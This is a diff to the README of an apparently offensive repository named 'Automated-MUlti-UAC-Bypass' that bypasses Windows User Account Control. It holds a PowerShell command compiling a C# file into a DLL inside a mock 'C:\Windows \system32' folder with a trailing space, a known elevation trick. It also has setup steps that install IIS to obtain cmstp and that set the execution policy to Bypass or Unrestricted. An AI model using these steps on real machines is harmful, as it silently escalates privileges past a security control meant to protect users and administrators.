x0xr00t/Automated-MUlti-UAC-Bypass/README.md

 `Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows \system32\sl0p.dll`

 # Windows 10 and 11
-* install Windows IIS libs, it is needed to get cmstp.
+* install Windows IIS, it is needed to get cmstp.
+* folder cmstp been added with the files, but it's not incorpotated as of now to copy the files to mock dir. (wil come later on)

 # Setup
 * `Set-ExecutionPolicy -ExecutionPolicy {Unrestricted or Bypass} -Scope CurrentUser`